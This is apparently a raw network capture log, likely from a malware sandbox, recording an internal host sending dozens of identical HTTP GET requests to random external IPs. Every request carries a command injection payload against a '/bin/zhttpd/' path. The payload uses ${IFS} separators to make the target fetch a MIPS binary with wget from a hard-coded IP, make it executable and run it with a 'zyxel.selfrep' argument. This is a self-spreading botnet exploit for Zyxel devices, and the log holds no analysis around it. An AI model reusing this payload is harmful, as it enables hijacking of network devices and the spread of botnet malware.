                                          Jan 14, 2024 15:46:13.943775892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3764192.168.2.2340092219.212.62.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943799019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3765192.168.2.235911866.202.233.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943852901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3766192.168.2.2333292221.22.73.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943883896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3767192.168.2.234941614.12.81.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943952084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3768192.168.2.2353264120.188.141.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943984032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3769192.168.2.234942879.140.208.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944014072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3770192.168.2.2339570105.100.169.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944037914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3771192.168.2.235139217.115.117.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944070101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3772192.168.2.2355790206.221.91.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944106102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3773192.168.2.2350766179.157.53.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944163084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3774192.168.2.2340398218.176.26.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944209099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3775192.168.2.235054646.215.179.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944226980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3776192.168.2.234153691.240.163.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944295883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3777192.168.2.235937844.22.194.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944319010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3778192.168.2.233349242.249.36.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944355965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3779192.168.2.2348030209.92.182.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944389105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3780192.168.2.2347892145.178.107.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944434881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3781192.168.2.233316885.58.149.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944477081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3782192.168.2.233944895.139.129.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944535017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3783192.168.2.2350142170.151.221.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944540024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3784192.168.2.2343984115.110.11.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944577932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3785192.168.2.2336300120.57.198.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944602966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3786192.168.2.235067435.2.190.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944648981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3787192.168.2.2358950196.42.106.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944685936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3788192.168.2.234608254.221.112.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944700956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3789192.168.2.233597461.92.227.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944765091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3790192.168.2.234564472.180.0.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944792032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3791192.168.2.2338334216.196.24.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944823027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3792192.168.2.2347422202.49.87.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944848061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3793192.168.2.234110475.245.2.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944859028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3794192.168.2.2348306196.200.137.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944925070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3795192.168.2.2338668190.116.81.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.944951057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3796192.168.2.234808658.102.210.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945014954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3797192.168.2.2339076203.21.96.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945045948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3798192.168.2.2337382223.21.133.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945075989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3799192.168.2.2346278168.32.105.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945136070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3800192.168.2.23560505.125.128.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945153952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3801192.168.2.235629084.203.12.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945204020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3802192.168.2.2351020173.117.11.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945235014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3803192.168.2.2349314219.168.215.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945290089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3804192.168.2.235756069.96.2.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945341110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3805192.168.2.235627684.9.219.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945364952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3806192.168.2.2354588207.54.211.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945403099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3807192.168.2.235466667.60.96.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945468903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3808192.168.2.2356804178.251.196.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945491076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3809192.168.2.2357996100.39.57.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945519924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3810192.168.2.2334900123.160.39.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945549965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3811192.168.2.2355800205.89.85.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945600033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3812192.168.2.23471908.69.126.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945622921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3813192.168.2.2344292213.175.109.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945676088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3814192.168.2.234052835.47.90.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945712090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3815192.168.2.2347592133.44.147.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945732117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3816192.168.2.235048096.104.84.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945776939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3817192.168.2.2357916149.106.83.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945822001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3818192.168.2.2342120135.115.193.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945848942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3819192.168.2.234607843.7.134.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945859909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3820192.168.2.233441012.223.14.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945909977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3821192.168.2.2355938170.0.195.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945939064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3822192.168.2.2334178119.59.242.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.945969105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3823192.168.2.2341176200.131.90.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946010113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3824192.168.2.234673449.189.251.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946047068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3825192.168.2.235919438.17.196.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.946091890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3826192.168.2.235305692.211.48.200443
                                          TimestampBytes transferredDirectionData
